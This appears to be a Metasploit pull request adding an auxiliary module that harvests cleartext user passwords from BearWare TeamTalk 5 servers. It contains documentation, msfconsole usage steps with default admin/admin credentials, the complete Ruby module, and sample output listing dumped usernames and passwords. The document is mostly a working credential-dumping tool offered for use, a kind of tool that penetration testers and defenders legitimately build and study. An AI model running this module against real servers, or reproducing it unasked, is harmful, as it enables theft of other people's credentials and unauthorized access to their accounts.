### PR TITLE
Add TeamTalk Gather Credentials auxiliary module

### DIFF
--- a/documentation/modules/auxiliary/gather/teamtalk_creds.md
+++ b/documentation/modules/auxiliary/gather/teamtalk_creds.md
@@ -1,0 +1,53 @@
+## Description
+
+  This module retrieves user credentials from BearWare TeamTalk.
+
+  Valid administrator credentials are required.
+
+  Starting from version 5, TeamTalk allows users to login using a username and password combination. The username and password are stored on the server in clear text and can be retrieved remotely by any user with administrator privileges.
+
+
+## Vulnerable Application
+
+  [TeamTalk 5](http://www.bearware.dk/) is a freeware conferencing system which allows multiple users to participate in audio and video conversations. The TeamTalk install file includes both client and server application. A special client application is included with accessibility features for visually impaired.
+
+  This module has been tested successfully on TeamTalk versions 5.2.2.4885 and 5.2.3.4893.
+
+  The TeamTalk software is available on the [BearWare website](http://www.bearware.dk/) and on [GitHub](https://github.com/BearWare/TeamTalk5).
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use auxiliary/gather/teamtalk_creds`
+  3. Do: `set rhost <RHOST>`
+  4. Do: `set rport <RPORT>` (default: `10333`)
+  5. Do: `set username <USERNAME>` (default: `admin`)
+  6. Do: `set password <PASSWORD>` (default: `admin`)
+  7. Do: `run`
+  8. You should get credentials
+
+
+## Scenarios
+
+  ```
+  [*] 172.16.191.166:10333 - Found TeamTalk (protocol version 5.2)
+  [+] 172.16.191.166:10333 - Authenticated successfully
+  [+] 172.16.191.166:10333 - User is an administrator
+  [*] 172.16.191.166:10333 - Found 5 users
+
+  TeamTalk User Credentials
+  =========================
+
+   Username  Password                     Type
+   --------  --------                     ----
+   debbie    1234567890                   1
+   murphy    934txs                       2
+   quinn     ~!@#$%^&*()_+{}|:" <>?;',./  2
+   sparks    password                     2
+   stormy                                 1
+
+  [+] 172.16.191.166:10333 - Credentials saved in: /root/.msf4/loot/20170724092809_default_172.16.191.166_teamtalk.user.cr_034806.txt
+  [*] Auxiliary module execution completed
+  ```
+

--- a/modules/auxiliary/gather/teamtalk_creds.rb
+++ b/modules/auxiliary/gather/teamtalk_creds.rb
@@ -1,0 +1,178 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'TeamTalk Gather Credentials',
+      'Description' => %q{
+        This module retrieves user credentials from BearWare TeamTalk.
+
+        Valid administrator credentials are required.
+
+        This module has been tested successfully on TeamTalk versions
+        5.2.2.4885 and 5.2.3.4893.
+      },
+      'Author'      => 'Brendan Coles <bcoles[at]gmail.com>',
+      'References'  =>
+        [
+          # Protocol documentation
+          ['URL', 'https://github.com/BearWare/TeamTalk5/blob/master/ttphpadmin/tt5admin.php']
+        ],
+      'License'     => MSF_LICENSE))
+    register_options [
+      Opt::RPORT(10333),
+      OptString.new('USERNAME', [false, 'The username for TeamTalk', 'admin']),
+      OptString.new('PASSWORD', [false, 'The password for the specified username', 'admin'])
+    ]
+  end
+
+  def run
+    vprint_status 'Connecting...'
+
+    connect
+    banner = sock.get_once
+
+    unless banner =~ /^teamtalk\s.*protocol="([\d\.]+)"/
+      fail_with Failure::BadConfig, 'TeamTalk does not appear to be running'
+    end
+
+    print_status "Found TeamTalk (protocol version #{$1})"
+
+    report_service :host  => rhost,
+                   :port  => rport,
+                   :proto => 'tcp',
+                   :name  => 'teamtalk'
+
+    vprint_status "Authenticating as '#{username}'"
+
+    req = "login username=\"#{username.tr('"', '\"')}\" password=\"#{password.tr('"', '\"')}\""
+    res = send_command req
+
+    unless res.to_s.starts_with? 'accepted'
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    print_good 'Authenticated successfully'
+
+    if res =~ /usertype=2/
+      print_good 'User is an administrator'
+    else
+      print_warning 'User is not an administrator'
+    end
+
+    vprint_status "Retrieving users..."
+
+    res = send_command 'listaccounts'
+
+    if res =~ /^error/ && res =~ /message="Command not authorized"/
+      print_error 'Insufficient privileges'
+      return
+    end
+
+    unless res =~ /^ok\r?\n?\z/
+      print_error 'Unexpected reply'
+      return
+    end
+
+    cred_table = Rex::Text::Table.new 'Header'  => 'TeamTalk User Credentials',
+                                      'Indent'  => 1,
+                                      'Columns' => ['Username', 'Password', 'Type']
+
+    res.each_line do |line|
+      line.chomp!
+      next unless line =~ /^useraccount/
+
+      user = line.scan(/\s+username="(.*?)"\s+password=/).flatten.first.to_s.gsub('\"', '"')
+      pass = line.scan(/\s+password="(.*?)"\s+usertype=/).flatten.first.to_s.gsub('\"', '"')
+      type = line.scan(/\s+usertype=(\d+)\s+/).flatten.first
+
+      cred_table << [ user, pass, type ]
+      report_cred user:     user,
+                  password: pass,
+                  type:     type,
+                  proof:    line
+    end
+
+    if cred_table.rows.empty?
+      print_error 'Did not find any users'
+      return
+    end
+
+    print_status "Found #{cred_table.rows.size} users"
+    print_line
+    print_line cred_table.to_s
+
+    p = store_loot 'teamtalk.user.creds',
+                   'text/csv',
+                   rhost,
+                   cred_table.to_csv,
+                   'TeamTalk User Credentials'
+
+    print_good "Credentials saved in: #{p}"
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+    print_error e.message
+  ensure
+    disconnect
+  end
+
+  private
+
+  def username
+    datastore['USERNAME'] || ''
+  end
+
+  def password
+    datastore['PASSWORD'] || ''
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address:      rhost,
+      port:         rport,
+      service_name: 'teamtalk',
+      protocol:     'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type:     :service,
+      module_fullname: fullname,
+      username:        opts[:user],
+      private_data:    opts[:password],
+      private_type:    :password
+    }.merge service_data
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core:              create_credential(credential_data),
+      status:            Metasploit::Model::Login::Status::UNTRIED,
+      access_level:      opts[:type],
+      proof:             opts[:proof]
+    }.merge service_data
+
+    create_credential_login login_data
+  end
+
+  def send_command(cmd = '')
+    cmd_id = rand(1000)
+    sock.put "#{cmd} id=#{cmd_id}\n"
+
+    res = ''
+    timeout = 15
+    Timeout.timeout(timeout) do
+      res << sock.get_once until res =~ /^end id=#{cmd_id}/
+    end
+
+    res.to_s.scan(/begin id=#{cmd_id}\r?\n(.*)\r?\nend id=#{cmd_id}/m).flatten.first
+  rescue Timeout::Error
+    print_error "Timeout (#{timeout} seconds)"
+  rescue => e
+    print_error e.message
+  end
+end

--- a/modules/auxiliary/gather/teamtalk_creds.rb
+++ b/modules/auxiliary/gather/teamtalk_creds.rb
@@ -149,7 +149,6 @@ class MetasploitModule < Msf::Auxiliary
     }.merge service_data
 
     login_data = {
-      last_attempted_at: DateTime.now,
       core:              create_credential(credential_data),
       status:            Metasploit::Model::Login::Status::UNTRIED,
       access_level:      opts[:type],


### PR DESCRIPTION
This PR adds a post-auth credential dumping auxiliary module for BearWare TeamTalk versions 5.x.

        This module retrieves user credentials from BearWare TeamTalk.

        Valid administrator credentials are required.

        This module has been tested successfully on TeamTalk versions
        5.2.2.4885 and 5.2.3.4893.


## Verification

- [x] Start `msfconsole`
- [x] `use auxiliary/gather/teamtalk_creds`
- [x] `set rhost <RHOST>`
- [x] `set username <USERNAME>` (default: `admin`)
- [x] `set password <PASSWORD>` (default: `admin`)
- [x] `run`
- [x] **Verify** you get credentials

### Example Output

```
[*] 172.16.191.166:10333 - Found TeamTalk (protocol version 5.2)
[+] 172.16.191.166:10333 - Authenticated successfully
[+] 172.16.191.166:10333 - User is an administrator
[*] 172.16.191.166:10333 - Found 5 users

TeamTalk User Credentials
=========================

 Username  Password                     Type
 --------  --------                     ----
 debbie    1234567890                   1
 murphy    934txs                       2
 quinn     ~!@#$%^&*()_+{}|:" <>?;',./  2
 sparks    password                     2
 stormy                                 1

[+] 172.16.191.166:10333 - Credentials saved in: /root/.msf4/loot/20170724092809_default_172.16.191.166_teamtalk.user.cr_034806.txt
[*] Auxiliary module execution completed
```

## Installation

* [Download TeamTalk 5](http://bearware.dk/?page_id=353)
